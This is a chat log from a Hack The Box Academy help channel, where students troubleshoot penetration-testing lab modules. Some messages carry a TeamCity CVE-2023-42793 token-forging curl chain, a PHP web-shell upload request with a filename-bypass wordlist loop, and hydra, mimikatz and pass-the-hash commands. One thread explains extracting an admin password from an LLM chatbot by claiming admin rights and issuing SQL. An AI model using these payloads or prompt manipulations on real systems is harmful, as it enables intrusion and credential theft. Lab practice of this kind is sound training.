try them all out see how they work

i think theres a way to see it more verbose with descriptions too not sure atm though

that powershell course took me a while to get through

I just got it

Thanks for your support

Please don't share answers for module questions here~

got a question regarding the module windows fundamentals NTFS vs Shar permissions I'm using remmina to log into the server, but I can't ping with my terminal or pwnbox terminal... wtf

obvs i'm connected to the vpn and when I try to use the pwnbox the connection on my rdp is drop

@tidal cradle master, do you have any tips ?

get-help get-childitem sometimes i find myself also reading the associated powershell documentation

don't ping random people

it looks like, for whatever reason, there was a connection error

he is not random to me lol

ik lol

i mean, i want to verify if this is an issue from the htb server itself

wtf

not all labs respond to pings, typically windows machines don't respond to pings

i changed to UDP to TCP and nothig

oh okok

if you can rdp → then it's up and running

then how can i do the module then? if when i connected to the pwnbox the RDP connection is drop

not sure with remmina but i know with xfreerdp there's the /timeout: option

i'm supposed to smbclient, but I can't do it on my own shell. So, I tried on the pwnbox and that shit is dropping the connection

are you running the vpn on your own machine AND using the pwnbox at the same time?

if the answer is yes: don't do that

okok

so basically just RDP and then use the pwnbox, correct?

no

either:

• use your own vm
• use the pwnbox
  one or the other

this happen when i tried to connect to the pwnbox, the rdp is drop

sigh

do you want the short answer or the longer/technical answer as to why this is occuring

i can't even connect to the smb, so technical please, becuase i dont understand jack

short answer: the vpn assigns the same internal IP address
longer/technical: because the vpn statically assigns the internal IP you encounter what's known as "network collisions" which is to say that the packets don't know where to go back to because it's trying to go to two devices that are assigned the same IP

in short: don't use the pwnbox AND your own vm at the same time

ok but the vpn is not even connected

otherwise this is what to expect. Connection errors

then how are you rdp in if you're not connected to the vpn?

i just log out to test if the pwnbox is able to smb

but i am getting the connection time out as well

i bet is a server issue

well if changing the vpn region and resetting the target doesn't work. reach out to support

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

okok thanks

Hello, I am a bit stuck in the Advanced XSS and CSRF Exploitation Skill Assessment. I am moderator, tried some things for data exfiltration but not working. Any nudge on this skill assessment?

hey guy, I got some troubles in this challenge: https://academy.hackthebox.com/module/113/section/1094
I do correctly following this guide but I can not gain remote code execution. Pls help me

in LOGIN BRUTE FORCIGN > Custom wordlists , htb give code hydra -L usernames.txt -P jane-filtered.txt IP -s PORT -f http-post-form "/:username=^USER^&password=^PASS^:Invalid credentials"
to use for solving the question but did the intentionally give teh wrong format?

coz valid ans is Short answer: The example as written is incomplete/misleading. It will trigger “Invalid target definition!” because the target/module part is in the wrong order.

What’s wrong in that line

It places IP -s PORT before the module, which uses Hydra’s generic target syntax, but then also supplies the http-post-form triple separately — mixing two different styles.

For form attacks, Hydra expects either:

Module-prefixed URL style: http-post-form://HOST:PORT followed by the "PATH:BODY:COND" triple, or

Generic host with -m specifying the triple (less common for web forms).

i waas doing the old modules question for revision , now everything was easy and i noticed that many code/script format given was wrong thats why i was spending too much time and days when i first doing the modules

I am also stuck here. I am not what I am missing beside that the fact I know that SQL can be executed to get the DB but not able to load file.

Did anyone elses search for the last question in the Skills Assement for Web Fuzzing take like an hour and half?

Whoops got a little crosseyed, but I agree that the response both show 200 OK with different body message. So from my understanding, the url encoded file name input is being taken at face value instead of being parsed? Is there an option to fix this?

anyone can give a little hint where to look in the skills assessment for using crackmapexec module? stuck on the third question

got the local admin on mssql server, but cannot move to the next part

htb giving some problems with wireshark any tips? i set to all users can capture packets but still no avail

Hi, having trouble with the module on Windows Lateral Movement.

Section: https://academy.hackthebox.com/module/263/section/3084
Issue: How do I enable Restricted Admin Mode on SRV01 so that I can PtH to SRV02? The 2 accounts that I have do not have admin rights

ive done all this and it doesn't show interface after i press 'yes'

try to start the wireshark with sudo

didnt do anything aborted because gui error

upgrading currently

DM me, I think I can help

I remember doing it, must be simple

try to connect to rdp via GUI from srv01, not mstsc.exe, that should help

can you check dm please?

You must use Burpsuite

In Kerberos Attacks - Constrained Delegation Overview & Attacking from Windows, it never states why when we see the use of HTTP as the altservice when it is Constrained Delegation of www/WS01

and I couldn't find any resources, like it just states use HTTP, but why and how are we expected to know that since its www/WS01 we use altservice:http in the Rubeus query

nope

dm if you need help, to avoid spoiling here

Hi guys, query on the Skills Assessment of Windows Privilege escalation PT 1.

Question 2:

“Find the password for the ldapadmin account somewhere on the system”.

i tried to run RoguePotato.exe , PrintSpoofer but give something [-] Named pipe error . how to do it ? any guide plz

first module y r my pings n nmap not returning

Are you using PwnBox or VPN?

currently attempting code two

im connected to the starting point

o

via VPN?

openVPN

ill try connecting to play machhines instead of starting point probably the issue

embarrassing 🙈

#1406335946848473249 read and follow #welcome to gain access to that channel

hey bro, do you got this challenge

Module: Intro to C2 Operations with Sliver
Section: Probing the Surface
Question: Assess further the web application and submit the name of the database user

Any hint regarding this question? Thank you!

??

try to read databases with that user now

Don’t encode it then

Same here. Don't really understand the underlying problem here. However, when I ran the 2.7.1 version, it gave me this error:2025-08-24T04:19:26.9273949-07:00|ERROR|Error during main ldap query:PagedQuery - Caught unrecoverable exception: The server does not support the control. The control is critical. (0).

I solved it in another way, not with Bloodhound. It is shown in the module how else you can find out about kerberoastable users manually

Yes, indeed.

hello everyone i am doing
Intro to Academy's Purple Modules

Page 6
Usage Example: JetBrains TeamCity CVE-2023-42793 i put those 2 commands curl -X POST \

-H "Content-Type: application/xml"
-d '<?xml version="1.0" encoding="UTF-8" standalone="yes"?><token name="RPC2" creationTime="2024-11-13T06:55:16.176-06:00" value="eyJ0eXAiOiAiVENWMiJ9.dWRYeEc2dFM3X2VuRV9yZTJCbFpOcUloNWVV.Y2M0ODIzZGEtMTUyNy00NmY3LThiNzgtM2E0M2YzMmY0YjQ4"/>'
http://10.129.232.10/app/rest/users/id:1/tokens/RPC2 as well as curl -H "Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.dWRYeEc2dFM3X2VuRV9yZTJCbFpOcUloNWVV.Y2M0ODIzZGEtMTUyNy00NmY3LThiNzgtM2E0M2YzMmY0YjQ4" -X POST "http://10.129.232.10/admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true" and they work but then i put this command curl -H "Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.dWRYeEc2dFM3X2VuRV9yZTJCbFpOcUloNWVV.Y2M0ODIzZGEtMTUyNy00NmY3LThiNzgtM2E0M2YzMmY0YjQ4" "http://10.129.232.10/admin/admin.html?item=diagnostics&tab=dataDir&file=config/internal.properties" and it shows this Could not authenticate with provided token
To login manually go to "/login.html" page can someone explain why this happens to me please;

You skipped the step of obtaining the valid token

The valid token from what i am reading is given to you in this command curl -X POST http://<Target_IP>/app/rest/users/id:1/tokens/RPC2

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><token name="RPC2" creationTime="2024-11-13T06:55:16.176-06:00" value="eyJ0eXAiOiAiVENWMiJ9.dWRYeEc2dFM3X2VuRV9yZTJCbFpOcUloNWVV.Y2M0ODIzZGEtMTUyNy00NmY3LThiNzgtM2E0M2YzMmY0YjQ4"/> but when i put this command it shows an error this is the only step to optain the valid token only

Did you get it ?

Check the creationTime, you must get a valid token before executing the other commands using the obtained token

Yes. The trick is to use burpsuite. The SQL execute will then allow you to capture the flag. Let me know if you really need to know where the flag is? Else I try not to give spoiler

Attacking AI - Application and System
Model Deployment Tampering

Were you able to get this working. For me in module #Model Deployment Tampering. i am able to get the GET request to /RCE endpoint like shown in the module but to get the RCE working. I portforwarded a remote port and later ran simple bash RCE to the port but i was never able to get the shell. Were you successful to get it finally working?

I ll send you DM

i am doing AD skill assessment 1

i am not able to get shell

what should i do

burpsuite in order to get the request to the repeater but how else is that helping us ?

Tried read system files with load file but didnt work

I just finished the Documentation & Reporting Module but I'm finding despite making a report template with findings etc for WriteHat it isn't showing the findings in the final report...
Will probably use SysReptor for Attacking Enterprise Networks module but I wanted to get a final report for D&R. Anyone get the same issue?

This is a rabbit hole. No need to go to read system file.

If you did not use the repeater of burpsuite what did you do with it?

just review the requests going through ?

If you use the web llm chat. You can run sql by saying you are admin to get password of admin. The llm chatbot will reply empty. Because the browser will block it. Burp is to see the response before it reaches your browser

The module is not clear on where the flag is. The flag is the password of admin.

That has to be a problem on your browser, its not blocking anything. Like if you repeat the prompts the module is telling you like i am an admin, execute the query select @@verison you will get the answer back. Wont you?

Yes. That will show and all else will show except admin password. Have you tried with SELECT password FROM users where id =1. You will realize that it will not show admin password.

nvm its working now under UAC section

No, cause show tables wont give me a users table

Just got it but got no idea how that should have worked

The only table show tables show is items which only returns 1 like when you query it to select * from users;

It is because it is only showing 1 word only. For the llm module. You will have to use SELECT table_name FROM INFORMATION_SCHEMA.TABLES LIMIT 1,1

Using limit 1,1 follow by 2,1 and …. Will allow you to show one word at a time till you see the different tables

Never mind. Solve the non working powershell.exe problem with a work-around solution.

@median gale The process to enumerate the different tables and columns will take some time. You can try slowly to see. And you will be able to find the Users table. There are other tables as well, which wasted a lot of my time to enumerate

Nice man thank a lot, helped a lot. You completed the module ?

Not yet. I am stuck with the model deployment Tampering. The question is not clear so I will need some time to dig. Do let me know if you managed to clear it.

I disable url encoding the payload.

How would I resolve the following parsing issues / could someone help me understanding what is happening under the hood? I manage to upload shell.php/.png, but I can't seem to access /profile_images/shell.php/.png via curl, browser , or burpsuite. I also tried /profile_images/shell.php.png and url encoding but no luck.

Are there flags in curl that I should enable?

I'm now on File Upload Attacks: Whitelist Filters

Check you DMs i ll send anything to you therre

@median gale 🙏

Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)

In getting started / public exploits this is the correct exploit to use right to complete the question? got a bit stuck so any help is appreciated!

Hey! Is here anyone expert hacker? If yes, kindly dm me asap. It's urgent

I'm doing HTB academy Bug Bounty Hunter Path, so I'm trying to restrict myself to the module teachings (getting the right regex + learning burpsuite) 😅 . Although, nmap and msf is very tempting to use right now

haha yea i am going to start that after finishing the pentesting pathway since i have access to a student subscription and im trying to make the most of it but yea

metasploit is the easy way out ig 😭

This is not a hacker for hire server. Please read #rules

Hello everyone,
I am solving the Codetwo machine and I found the user flag but the when I want to take the root
I want to make changes and edit the. Npbackup.conf ,it crash and can't edit and then ... Error
Anyone? Help plz

But I find how they coded the parsing behavior of the server weird or is it just me. I'm just a FastAPI dev 😅

My bad. Apologies accepted

Please ask in #1406335946848473249
**If you don't have access read #rules and follow #welcome **

Yes that's the correct module
-# as far as I can remember

Hey can i ask about the Live engagement in private if anyone has done it? (Shells and payloads)

hello everyone

Hi guys, query on the Skills Assessment of Windows Privilege escalation PT 1.

Question 2:

“Find the password for the ldapadmin account somewhere on the system”.

i tried to run RoguePotato.exe , PrintSpoofer but give something [-] Named pipe error . how to do it ?

i ask chatgpt so long tell me :
⚡ What this means for you

KB3199986 / KB3200970 (and later cumulative updates) kill Rotten/JuicyPotato.

Later 2020+ updates kill PrintSpoofer & GodPotato on Win10 20H2/Server 2019.

That’s why all your attempts end in “pipe timeout” or “failed to impersonate.”

what to do any guide plz
thanks in advance

ok i guess will ask here, So i dont have access to any browser?

Answer that question last.

what u mean ?

It looked like you were stuck on Q2. If so, wait until you've answered 3&4 then circle back to answer Q2.

how do I find all listening interfaces on the target system?

I used ss -tulwn

but the answer was incorrect

of course I filtered the output first

hi guys
somebody concluded the Password Cracking module ?

I am stucking in
Module: Intro to C2 Operations with Sliver
Section: Privilege Escalation

The https://github.com/TheWover/donut tool is not compatible with arm64 architecture, does anyone know a solution?

Hi, did you solved it?

Wassup

HTB changed my name.. crazy 🤪

Someone else answered my message in the feed, filter by my comments and you should be able to retrace but UV package manager helped basically

because it didn't comply with #rules

Oou.. gotcha 💪

Ok, thx, I solved it too 🙂

Hello do we still have access to the modules we complete even when we don't have a subscription any more ?

yes

All modules that you have completed are yours to keep.

awesome thank you !

Hello,
I hope you're going well.

has anyone ever encountered the following error "1312,PSSessionStateBroken' when using invoke-command?

Context: I'm on a child dc and I'm trying to invoke commands on the parent dc. I've already forged an Inter-realm tgt and an ST for HOST and HTTP.

Thanks a lot.

Hello

Hello

everyone saying hello, no one saying bye

https://tenor.com/view/rainbow-spongebob-imagination-gif-16754969172304048067

Anyone completed the NTLM Attack module, I'm stuck and need some help? Please reply to this message and I will DM you

You need to stop sending me DMs, unless I tell you in this channel that you can send me one. I currently do not have the time to help you with that SA. I suggest searching this channel for related questions and if you aren't getting any assistance in here, review the module material. If your issue is pivoting related, get your Google on, or hold off on this skills assessment until you have gone through enough of the pivoting module to get through the Password Attacks SA.

seriously
excuse me bro, it won't happen again

it's part of the #rules not to send other users unsolicited DMs; rule #8

how can i unlock the general?

Read and follow #welcome

where can i get the account_identifier?

https://app.hackthebox.com/profile/settings

Guys is it possible to earn cubes?

You can buy them. Sometimes there are competitions on HTB's social media channels, and you can win Cubes during the season.

hello why is this why doesnt this password work?

I have entered this

USER anonymous[Ctrl+V][Enter][Enter]
PASS anything[Ctrl+V][Enter][Enter]
PASV[Ctrl+V][Enter][Enter]

at the bottom right in Pownbox and then into the terminal.
It still doesn’t work.
What do I have to do?

maybe its wrong? What module / page are you on?

windows cli user and group mgmnent and i tried mtanaka

also

you got the link for the page of the module?

can i send here tho?

https://academy.hackthebox.com/module/167/section/1618

i thought you could, i always get asked for that when im raising questions, so people know what bit you're stuck on

Type it manually

i did it didnt work

nvm it worked now

I have entered this

USER anonymous[Ctrl+V][Enter][Enter]
PASS anything[Ctrl+V][Enter][Enter]
PASV[Ctrl+V][Enter][Enter]

at the bottom right in Pownbox and then into the terminal.
It still doesn’t work.
What do I have to do? ❤️

to paste text in terminal ?

yeas i do anything but nothing is work

try ctrl + shift + v

to paste

@north sage

can someone help me with this error? I followed the steps specified by the module exactly

It is somewhere in this 2 hours 10 minute video
https://www.youtube.com/watch?v=3bvKLj0akMM

which one i paste ?
USER anonymous[Ctrl+V][Enter][Enter]
USER anonymous

oof this is gonna be rough

Hello ! The command netexec smb <ip/24> -u Administrator -d . -H <hash_value> is the same with the command netexec smb <ip/24> -u Administrator -H <hash_value> —local-auth?

i don't understand why using target with nmap or gobuster on pwnbox works

but in kali linux it wont work

any idea why ?

I found the problem.
I entered the commands after the bash prompt returned, not while nc <target id> 21 was running.
Then the variant [Ctrl+V][Enter][Enter] worked during the process as well.

Someone already answered your question 3 days ago.

I didn’t see that . Thank you

hey how do you get access to #general am i a dunce

Read and follow #welcome

so yes i am a dunce and cant read. thanks :p

Bumping this since I'm running into similar troubles in another lab. There's also a bunch of typos in the entire AI Red Teamer path. The material is great, don't get me wrong, but it looks a bit rushed

Hi guys! Im new on the server! Anyways.
I`m stuck at the File Upload Attacks - Whitelist Filters module.
i used this code to make a wordlist:
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\' '.' '…' ':'; do
for ext in 'php' '.php2' '.php3' '.php4' '.php5' '.php6' '.php7' '.phps' '.phps' '.pht' '.phtm' '.phtml' '.pgif' '.shtml' '.htaccess' '.phar' '.inc'; do
echo "shell$char$ext.jpg" >> wordlist.txt
echo "shell$ext$char.jpg" >> wordlist.txt
echo "shell.jpg$char$ext" >> wordlist.txt
echo "shell.jpg$ext$char" >> wordlist.txt

also I added jpeg, png.

done
done

then did a burp intruder to try and upload the php shell using the fordlist for the name:
POST /upload.php HTTP/1.1
Host: 83.136.253.59:50496
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------131615687336890501682755748198
Content-Length: 109713
Origin: http://83.136.253.59:50496
Connection: keep-alive
Referer: http://83.136.253.59:50496/
Priority: u=0
-----------------------------131615687336890501682755748198
Content-Disposition: form-data; name="uploadFile"; filename=""
Content-Type: image/jpeg
<?php system($_GET['cmd']);?>
-----------------------------131615687336890501682755748198--
now i would sort by length and look at the response to see if i can find something like "file uploaded".
but since i cant find it (because it didnt work but anyways)
i use this to maybe see it:
ffuf -w wordlist.txt:FUZZ -u http://83.136.253.59:50496/profile_images/FUZZ?cmd=id
but all i get back are the 403 forbidden phps ones

Working Cracking Encrypted/Protected Archives

https://academy.hackthebox.com/module/147/section/1323

We go over how to tell if a zip or archive is password protected using file and a few other scenarios.

I'm curious if the file archive.zip cmd will ever mislead you and tell you it detects an archive but not that its password protected? (And if it did would it fail to extract, or leave you with a 0 byte file or something?)

and more broadly speaking whether other archive formats gzi, tar, .tar.gz will do this?

hey

@lone pumice Please don't post flags

hell nah

that's not the flag, bro

Best to say the module section and question you're on. If it's not accepting it, you're not inputting the flag correctly or it's a flag for another question.

solved, thx

I'm working on the Module Intro to C2 Operations with Sliver, in the Assumed Breach chapter. There is only one question, but for the last 2 days RDP crashes on the target system within seconds of making a successful connection. Once it crashes, the port is no longer open and it's impossible to reconnect.

I have switched VPN servers several times, switched from UDP to TCP vpn and back again with no luck. Is there something I'm missing?

did you try connecting with your rdp client (xfree?) with udp?

er tcp?, i think thats often suggested

whichever the opposite of the default is.

@gray leaf ^

I don't think xfree supports UDP? I did try switching VPN from one to the other though

gpt is telling me the xfree default connects with tcp but you can change that with this

xfreerdp /v:target /u:user /p:pass /network:udp YMMV

Hello, I am a bit stuck in the Advanced XSS and CSRF Exploitation Skill Assessment. I am moderator, tried some things for data exfiltration but not working. Any nudge on this skill assessment?

It sounds like you're on the right track. Now that you're a mod you should have access to another feature on the site that you couldn't access before (tasks) where the admin will check.

Anyone can help me with the CME module

nvm

Anyone for "Attacking Windows Creds Manager" https://academy.hackthebox.com/module/147/section/3714

I'm wondering if mimikatz is the solution here, its one of the few times i've used it and ive never encountered errors before

Sorry that is a new queston -- but it says u have to bypass UAC, so maybe it will work after that

i thought i had done that, apparently not. going to keep messing with it

thx bud

Hey question

Have u done the CME module?

On the assessment -- I bruted all RID usernames but the supposed correct password does not work on any of them

ah i was being silly its simple the fucking hints man...

no im no where near the CME modules yet >_<

holy kiss my ass the machine is gonna die and i cant extend it and im on my last 15 minutes or whatever

wow just got lucky it all came together

You dont need to bypass UAC, pasta works just fine

thx @fathom pendant I thought the hint was telling me i needed to find some type of complicated bypass. i had everything i needed.

Thats just to use mimikatz

and yes i ended up using pasta, or a dish like it.

And the bypass is actually really simple

Just gotta launch it from the cmd terminal youre impersonating

Yeah, i already had it i just needed to keep my contexts straight i didnt realize yeah esxactly

Instead of from the start menu

i guess there was diff groups

At least for the one I used

yup same here

DId anyone do the CME module can help me

CME Skills Assessment

• Cannot access the interns DB (returns nothing) (could it be empty)
• Cannot enable xp_cmdshell (does not work)
• Sysadmin returns "0"

Im working on the Hacking WordPress Module. Im at the part where they give you the admin user and pass so to you can put a reverse shell on. For whatever reason I can't login to the account. It just never loads. Any hints?

Do u have ur intercept on burp on

Or maybe the password is wrong

Or box is broke

Or u should refresh to check connectivity

Using wpscan confirmed the password

Turns out my suricata has a rule and I was blocking myself.

when you get got by your own security

Hi! Someone in Model Deployment Tampering from the module "Atacking AI - Application and System"?
I follow the steps of the exercise and I get this error:

  "code": 500,
  "type": "InvalidWorkflowException",
  "message": "Failed to parse yaml."
}```

im very weak with ffuf, are there more resources apart from the ffuf module in the academy?

Not that I know of. Maybe you can glean something from their wiki: https://github.com/ffuf/ffuf/wiki

Attacking Common Applications Application Discovery & Enumeration

When trying to run the -iL scopeList flag with nmap I get this error:

Failed to open input file scopeList for reading: No such file or directory (2)

The problem is in the error message. It can't find the file you're asking it to use a file (scopeList), that file is not present in your curreng working directory.

file doesnt exist

The file is in the current directory though

i don't believe it

Can I dm?

show the results of ls

Maybe I misspelled something?

But I can't send images

just copy the terminal output

linux is case sensitive as well

I'll try that

Hi guys, did anyone recently solve Pass the Certificate section Assessment of Password Attacks module ?

I was redoing the nmap module and saw the -sn flag. It's disables port scanning, I looked on nmap documentation and it says "The -sn option sends an ICMP echo request, a TCP SYN packet to port 443, a TCP ACK packet to port 80, and an ICMP timestamp request by default" isn't that a port scan?

Hi all ! This is the first community I've joined in hopes to learn and grow into the penetration testing role i so desire.

Am I in the right place lads/ladies/misc

Hi. Welcome. Yeah HTB is a great place to learn, specifically Academy.

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

You beauty. Google and gpt can only inform me so much. Are you a pen tester ?

No

Hi guys, Can I ask some question about Bug Bounty Hunter's Module

yes this is the channel for modules

I'm trying Attack Tuning Case5 in sqlmap's module, But when I got the flag and send, it return error

Can I show my payload about use sqlmap? or not

I'm trying to use
--dbms=mysql --batch -D testdb -T flag5 --dump --no-cast --level=5 --risk=3
and it was get a flag looks like: HTB{70X_XXXXXXXXXXXXX_17}
but when I send it to Module
It return error

I tried it myself. All I saw in Wireshark was an ARP and a DNS query

sudo nmap -sn 10.0.2.8

try it again with the --packet-trace, nmap shows TCP SYN and TCP ACK

no shut why wiresharke doesnt sh ow

imagine trying to scan 1000 ports on a subnet

just do one host

-sn is designed for running against subnets i.e. ip/24

Changing the time will it fix it i will try it;

oh yeah buty I mean just for this example

ye

i am just meaning for the purposes of what -sn does

my question was was does it saysn -sn dosnet do port scan then it says it sends TCP SYN packet to port 443, a TCP ACK packet to port 80

yes, but that's not necessarily a port scan

a port scan is checking a whole bunch of ports at once rather than specific ports

Hmmm... I've noticed something wierd. Trying sudoing it

Without sudo, packet trace showed it connecting to ports 80 and 443. But with sudo, its ARP and DNS

It matches what I saw in Wireshark

So somehow -sn works properly only if you sudo?

nope still the same issue

Has anyone finished it? It generates two targets, but the CA never seems to work.

I found the answer: Read this page https://nmap.org/book/man-host-discovery.html

Its behavior is consistent with what's written in the man page

likely raw packet creation issues

Yes

it can't create raw packets without sudo (or unless you do the setcap magic)

Learned something new today. I always sudo it so I never noticed

ye

sudo allows for nmap to do some lower level stuff

I was doing the module "Attacking Web Applications with FFUF", and seems something is wrong with the system, I got the URL which displays: "You don't have access!' but it says my answer is wrong

How is it possible?

use the literal word PORT

Damn

I need treats

It worked! Thanks 🙂

I tried with sudo but im' not seeing any arp or dns via wireshark

sudo nmap -sn 10.129.207.8 --packet-trace --reason

Sorry, I got it, try a lot time to reply and use --flush-session to get the real flag

Hi everyone,

I’m stuck on Introduction to NoSQL Injection, Skills Assessment II (https://academy.hackthebox.com/module/171/section/1692). I’ve only been able to find a valid user b****, but I can’t make any progress beyond that.

Every request I try just returns “Error: Missing 'username' parameter” or “missing password” or "missing token", and I can’t seem to get past it.

I’ve read all the messages about this exercise on the forum and Discord, and I see everyone mentioning to pay attention to the (.). I understand that this refers to using dot notation ||(.$regex)|| instead of brackets ||([$regex])||, but I still can’t figure out a way to advance.

I’ve been stuck for over a day now, tried multiple approaches, and it’s really frustrating. Any guidance or hints on how to approach this would be greatly appreciated.

Thanks in advance!

Very first module. Coming from THM. I've started a Pwnbox but can't see my target IP. In THM it usually populates in the question. Where is it here?

I've worked it out.

just above the question should be "Click here to spawn target!"

(i was already typing out before you worked it out lol)

Yep, thanks. lol

For the 2nd, remove the text.

For the 3rd try again, ip a | grep 1500

1st, maybe try the full path?

1: what would be the full "path"? ps /bash? 2: 6.11? 3: i cant type the | in the terminal emulator, nor can i paste it, paste anything for that matter

could it be that the emulator and everything in it got updated, but the "correct" answers are still that of the old emulator? cuz the next chapter all my seemingly right answers are also wrong

Hey anyone can assist with the Advanced Command obfuscation question?

I bypass the blacklists but i dont get the answer printed

echo $SHELL

for pasting into terminals: the keyboard shortcut is ctrl+shift+v

also please refrain from screenshots that may or may not contain answers

thanks

hey i'm a little confused with something in the SQLmap labs (https://academy.hackthebox.com/module/58/section/517) :
for the first question i used these flags : ||sqlmap 'link' --data='id=1' --batch --dbs --tables --dump||
but the dump didn't work, however when i do : ||sqlmap 'link' --data='id=1' --batch --dump||
it work flawlessly why doest the ||--dbs|| and ||--tables|| breaks everything ?

Hi all, still stuck on this 'https://academy.hackthebox.com/module/80/section/781'. How would I enumerate the admin ID without manually going through them all? I've tried intruder but all ids from 0-300 give me the same response. I've tried ffuf, which is also not working. Can someone help please? the guide says to go back a check the brute force methods but none of the methods teach us on how to enumerate the id, only the usernames or passwords. I've managed to get username but unable to brute force the password. Any ideas please?

this isn't a hacker for hire server;

omg just tried intruder again from 300-500 and one of them was the admin!

Does anyone know where I am supposed to get the creds for wley from? https://academy.hackthebox.com/module/143/section/1509 I think they are from somewhere earlier in the module, but I can't find them

I got it, its from earlier. If any mod is reading this, Im not a big fan of this approach

always save passwords, also mods aren't staff. you can drop /feedback though

/feedback goes directly to the htb staff slack

I guess, in general im a big fan, but this module is very intensive, and takes a long time. It feels mweh to have to look back for a password that does not really add anything to the current section

Thanks @fathom pendant

consider the whole module one big AD environment you're dissecting piece by piece

Makes sense

Okay it gets worse, the password does not work... while this was the answer in a previous section

Hello, im doing Pentest in a nutshell - Win system enum... but for god im not able to do the "What is the exact OS Version that WinPEAS delivers?". But if I use like (Get-CimInstance Win32_OperatingSystem).Version in ps i got version but its still bad. Wheres my mistake?

well the user in this section is specifically forend that you're using, (cross-forest trust abuse)

but the examples show user wley?

some of the others use forend

yes forend seems to work though. I think I can atleast finish the module now

Thanks again, and sorry it has beign a long day of study

the wley password is all lowercase fwiw

ye i know, it don't wanna spoil it here.. but i have it in all lowercase

Did anyone finish Rogue Actions from new AI Red Teaming path?

Please I need help 🙏🙏🙏

You can send me a dm

@winter vector was you able to finish the AI lab?

don't ping people randomly

Why randomly? He also was asking about this specific lab

I think you need to adjust your settings. Currently, you are not allowing DMs from other users.

not as of today, and in those cases as well it's best to use the reply feature instead of @ the user, this helps provide context

Hello i am new, what did i miss

It is not possible to use reply feature when using search

If you ever ran those creds with netexec, they should be stored in the nxcdb which you can access on your VM.

this isn't #general chat; i suggest reading #rules and following instructions in #welcome to gain access to more of the server

jump to message -> reply

Anyway, if anyone has a problem with Rogue Actions in new AI Red Teaming module let me know pls

Will we ever see a quantum computing module on htb? that would be cool

Use /feedback to send your feedback to the right place.

https://academy.hackthebox.com/module/195/section/2182

this module has been stressing me for awhile now, please help
Last question

" + 0 What is the name of the function that returns the string inside the cpp file? (Format:
FunctionName()).
Java_com_example_myapplication_MainActivity_stringFromJNI() "
[10:14 AM]
thats the answer but it still says incorrect

@formal jungle don't try and @ everyone, that ping doesn't work for you anyway. just have some patience

Hello, Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIndeitifer -eq $sid} -Verbose in AD (ACL) module has been hanging for 20 minutes now even though in the module it says it takes 1-2 minutes to run. Is this an issue?

If anyone has completed it, please let me know. I tried switching VPNs and pinging, but only DC01 responds; the CA is always down.Maybe I should write an email?

it definitely doesn't take 1-2 minutes to run, maybe for small domains.

About to finish the cpts path, I heard someone say that doing the crackmapexec module will help on the cpts. What do you guys think?

I suggest trying to use netexec to get a response instead of pinging.

Still couldn't finish the rogue attacks one. Everything else yes, although I do think the hardest part shouldn't be finding the flag lol

CME is also used in the CPTS path. Of course, it can be helpful to practice more with it, and this module is great for that.

Hmmm wondering what could we do about it

https://academy.hackthebox.com/module/147/section/1639
Hello, can't find john ticket

Do i miss something?

i've done :
.\mimikatz.exe "privilege::debug" "sekurlsa::tickets /export"

but never find john's .kirbi

Well, it's been like 40 minutes of something...

And in the end the command has shown no output...

Thank u ,but i think CA01(one of targets) isn’t working. When I used printerbug.py , feedback[*] Host is offline. Skipping!

If you still can't get it to work, you can DM what you are seeing and I can take a look.

Hello

in Active Directory Enumeration & Attacks
Internal Password Spraying - from Windows
is this normal ???

You might have to click inside the RDP window and hit enter.

oh ok it's worked thx

@fathom pendant

how can i activate my self ?

? you mean link your account

instructions are in #welcome

i have an error

say's contact with an administator

dm me

Was you able to read flag in Model DeploymenT Tampering?

Hi, I’m doing the Advanced Deserialization Attack with JSON lab but I can’t get the exploit to work. I followed the steps and everything seems fine in debug, but even the notepad.exe PoC doesn’t trigger locally. Has anyone else had this issue and is willing to help me ?

Module - Navigation- What is the index number of the "sudoers" file in the "/etc" directory? I am connected via open VPN. When I am doing the practice and pulling it up its telling me my answer is incorrect.

How do you guys know when to use the command prompt over powershell or vice versa, excuse my ignorance, but it seems that a lot of these commands overlap but some execute differently in both. I see them used interchangeably through active directory but there are so many commands I just can't understand the pattern.

https://academy.hackthebox.com/module/147/section/1326

Attacking Active Directory and NTDS.dit

I'm having trouble enumerating the domain correctly.

I've tried: nmap scripts (all the usual suspects), sending an invalid domain to kerbrute and seeing if it would "correct" me with the right domain on error, rpcclient, smbclient, dig the DC for various records (axfr, NS, PTR, etc)

uncertain what im not doing right

except guessing (i even tried inlanefreight.local and .htb as a guess with no dice) . I dont think guessing is the lesson they're trying to teach here (beyond educated guessing with valid context from the usernames and such)

nvm i guess i wasnt using the right script

Any progress ?

I'll have to try it out

Someone got a sec to help me compare some net user output? im curious why im seeing groups for net localgroup, but when i do net user <username> the local groups section is blank?

nevermind net localgroup shows both user and computer groups i guess?

Hi guys, I'm working on 'Intro To Network Traffic Analysis: Interrogating Network Traffic' where I need to analyze pcap file. What will be the best way to open up this pcap file? Should I download Wireshark in my Windows 11? I'm watching a YouTube set up his Kali Linux through Remote Desktop Connection but not sure what's the best route for this lab and moving forward!

I haven't done this module, but as long as you can pull down the pcap you can view it wherever you have Wireshark, so VM, pwnbox, etc.

you absolutely need to set up your linux (kali) VM first. then you will want to explore the dump thru tcpdump, wireshark and tuishark or whatever its called, tshark? whatever. get familiarity with all of them but for SURE tcpdump AND wireshark

you might be able to get away with just installing wireshark on windows at the moment but you will absolutely need a kali vm or similar as you get deeper into security.

I think it blocks ICMP packets but you can Nmap it and you'll find opened ports so I don't think this is the problem

so is the android application pentesting path complete now ?

also interestingly enough it seems like a hybrid cert covering both pentesting and defensive android work, not sure what to think about that 🤔

Sorry for posting here, but cannot post in general. Is there any channel for discussing retired HTB machines?

Try #boxes

If you have no access to #general read and follow #welcome

Thanks!

